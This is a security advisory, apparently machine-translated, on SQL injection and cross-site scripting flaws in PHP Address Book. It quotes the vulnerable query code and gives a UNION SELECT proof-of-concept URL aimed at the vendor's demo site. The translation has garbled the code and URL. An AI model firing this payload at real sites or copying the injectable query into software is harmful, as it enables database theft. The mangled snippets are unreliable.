Multiple SQL injection and cross-site scripting vulnerabilities in PHP Address Book
Release date:
Updated on:
Affected Systems:
PHP Address Book
Description:
Bugtraq id: 71862
PHP Address Book is a Web-based Address Book.
PHP Address Book has multiple SQL injection and Cross-Site Scripting Vulnerabilities. Attackers can exploit these vulnerabilities to steal cookie authentication creden。 and perform unauthorized database operations. Code with vulnerabilities:
If ($ id ){
$ SQL = "SELECT * FROM $ base_from_where AND $ table. id = '$ id '";
$ Result = mysql_query ($ SQL, $ db );
$ R = mysql_fetch_array ($ result );
$ Resultsnumber = mysql_numrows ($ result );
}
<* Source: Manish Tanwar
Link: http://packetstormsecurity.com/files/129789/phpaddressbook-sqlxss.txt
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
POC
Http://php-addressbook.sourceforge.net/demo/view.php? Id = 1337 'Union select, version (), 6, database (), 10, 11, 12, 13, 16, 17, 18, 19, 20, 21, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40 -- +
Image link :-
Http://oi62.tinypic.com/2lncw3a.jpg
Suggestion:
Vendor patch:
PHP Address Book
----------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://sourceforge.net/projects/php-addressbook/
This article permanently updates the link address: